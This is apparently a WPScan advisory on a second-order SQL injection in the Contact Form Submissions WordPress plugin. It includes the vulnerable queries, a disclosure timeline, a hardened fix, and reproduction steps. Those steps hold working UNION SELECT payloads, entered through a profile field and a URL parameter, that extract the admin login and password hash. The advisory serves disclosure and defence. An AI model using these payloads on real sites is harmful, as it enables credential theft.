The plugin is affected by a double query SQL injection, which could allow high privileged users to access data from the DBMS.

Edit (WPScanTeam)
October 26th, 2020 - Confirmed & Escalated to WP
October 27th, 2020 - WP Investigating
January 3rd, 2021 - No updates, disclosing
March 29th, 2021 - v1.7 released to attempt to remediate the issue using sanitize_text_field(), which does not fix the SQL injection
April 7th, 2021 - v1.7.1 released, fixing the issue
Prerequisites:
Install Contact Form 7
Install Contact Form Submissions

Affected file: contact-form-submissions/Admin.php:416

Code:

```php
global $wpdb;
// $form_id is interpolated into the query without escaping or preparation,
// so a value such as "0 UNION SELECT ..." rewrites the statement.
$post_id = $wpdb->get_var("SELECT post_id FROM $wpdb->postmeta WHERE meta_key = 'form_id' AND meta_value = $form_id LIMIT 1;");
// $post_id is whatever the first query returned and is interpolated
// unprepared as well, which is what makes this a double (second-order) query injection.
$columns = $wpdb->get_col("SELECT meta_key FROM $wpdb->postmeta WHERE post_id = $post_id AND meta_key LIKE '%wpcf7s_%' GROUP BY meta_key");
```

To reproduce:
1 - Authenticate with an admin user.
2 - Access the profile page, change the last name field to 0 UNION SELECT concat(user_login,'---',user_pass) FROM wp_users WHERE ID=1--
3 - Open https://localhost/wp-admin/edit.php?post_type=wpcf7s&wpcf7_contact_form=0 UNION SELECT meta_value FROM wp_usermeta WHERE umeta_id=1 and increment the umeta_id parameter until the admin username and hashed password are output as a column.
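A hardened form of the two queries, added here as an example and not the plugin's own v1.7.1 fix. It assumes the WordPress $wpdb global and that $form_id originates from the wpcf7_contact_form request parameter shown in the reproduction URL; the function name cfs_columns_fixed is hypothetical.

```php
<?php
// Added example (hypothetical helper, not plugin code): the same lookup as
// Admin.php:416, with both queries prepared so neither the request value nor
// the result of the first query can change the shape of the SQL.
function cfs_columns_fixed( $form_id ) {
    global $wpdb;

    // A form ID is a post ID, so coerce to a non-negative integer up front.
    // This is a type check, which sanitize_text_field() (the v1.7 attempt) is
    // not: it strips tags and control characters but leaves quotes, spaces
    // and SQL keywords intact.
    $form_id = absint( $form_id );
    if ( 0 === $form_id ) {
        return array();
    }

    // %d binds the value as an integer; the query text is fixed.
    $post_id = $wpdb->get_var( $wpdb->prepare(
        "SELECT post_id FROM {$wpdb->postmeta} WHERE meta_key = 'form_id' AND meta_value = %d LIMIT 1",
        $form_id
    ) );
    if ( null === $post_id ) {
        return array();
    }

    // Second query: the value read back from the database is bound too, so a
    // string planted in postmeta/usermeta is data here, not SQL. The LIKE
    // pattern goes through esc_like() and %s rather than a literal '%wpcf7s_%'
    // (a bare % inside prepare()'s format string would need to be written %%).
    return $wpdb->get_col( $wpdb->prepare(
        "SELECT meta_key FROM {$wpdb->postmeta} WHERE post_id = %d AND meta_key LIKE %s GROUP BY meta_key",
        absint( $post_id ),
        '%' . $wpdb->esc_like( 'wpcf7s_' ) . '%'
    ) );
}
```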
Lenon Leite
2021-01-03
2021-04-08